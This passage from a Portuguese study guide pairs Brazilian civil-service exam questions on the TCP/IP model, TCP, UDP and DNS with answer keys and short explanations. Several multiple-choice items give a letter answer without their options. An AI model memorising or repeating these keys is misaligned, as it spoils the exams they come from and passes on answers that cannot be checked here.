33 (CESPE 2010 INMETRO Pesquisador Ciência da Computação) O único serviço que é realizado tanto pelo protocolo TCP quanto pelo protocolo UDP da camada de transporte da arquitetura TCP/IP é Letra E. O protocolo TCP é baseado na conexão encapsulada no IP. Ele garante a entrega dos pacotes, sendo feito o envio de forma sequencial, realizando um checksum que valida tanto o cabeçalho, quanto os dados do pacote. Se houver perda do pacote ou ele estiver corrompido, será feita a retransmissão do que houve falha. (CESPE 2011 Correios Analista de Correios Engenheiro Engenharia de Redes e Comunicação) Julgue os seguintes itens com base no modelo de referência TCP/IP. Os serviços DNS são imprescindíveis para a comunicação em redes TCP/IP, já que, sem eles, a camada de rede se torna totalmente inoperante, fazendo que, em nenhuma situação, ocorra comunicação IP. ERRADO. O DNS (Sistema de Nomes de Domínio) é um sistema para atribuição de nomes a computadores e serviços de rede, organizado numa hierarquia de domínios. As redes TCP/IP, tais como a Internet, utilizam o DNS para localizarem computadores e serviços através de nomes amigáveis. Sendo assim, se o usuário souber o endereço IP do que ele está querendo se comunicar, ele poderá utilizar a rede normalmente, só será mais trabalhoso ter que saber os IPs de todos em sua rede, o que torna inviável em redes corporativas. (CESPE 2011 Correios Analista de Correios Analista de Sistemas Suporte de Sistemas) A camada física do protocolo TCP/IP mantém suporte a aplicações do usuário e interage com vários programas, para que estes se comuniquem via rede. ERRADO. Este é um trabalho da camada de Aplicação. (FCC 2010 TCE-SP Agente da Fiscalização Financeira Informática Produção e Banco de Dados) Pela ordem, da mais baixa (1ª) até a mais alta (4ª), as camadas do modelo de

34 referência TCP/IP são Letra E. Mostrei os diversos nomes para cada uma das camadas neste artigo. Baseada na questão, temos a resposta Host/rede, Inter-redes, Transporte e Aplicação. (CESPE 2011 Correios Analista de Correios Analista de Sistemas Suporte de Sistemas) A camada de aplicação na arquitetura TCP/IP equivale às camadas de aplicação, apresentação e sessão da arquitetura OSI. CERTO. Veja a figura desta postagem. (FCC 2011 TRT 24ª REGIÃO (MS) Analista Judiciário Tecnologia da Informação) São protocolos da camada 3 (rede, inter-redes ou internet) do modelo TCP/IP de cinco camadas: Letra E. Mas só para esclarecer quanto a quantidade de camadas. Alguns autores identificam um total 5 camadas, como citada na questão, que seriam: Físico, Link, Internet, Transporte e Aplicação. Mas Tannenbaum e a própria RFC adotam apenas 4. (IPAD 2010 Prefeitura de Goiana PE Administrador de Redes 1) Os protocolos da arquitetura TCP/IP são organizados em camadas. Acerca desse assunto, analise as seguintes afirmativas: 1. A camada física está relacionada a características elétricas e mecânicas do meio de transmissão. 2. Os protocolos TCP e UDP fazem parte da camada de rede. 3. Os protocolos HTTP e FTP fazem parte da camada de transporte. Assinale a alternativa correta: Letra D. Analisando cada uma das afirmativas: 1-Correto; 2- Errado, pois o TCP e UDP fazem parte da camada de Transporte; 3-Errado, já que o HTTP e FTP são da camada de Aplicação.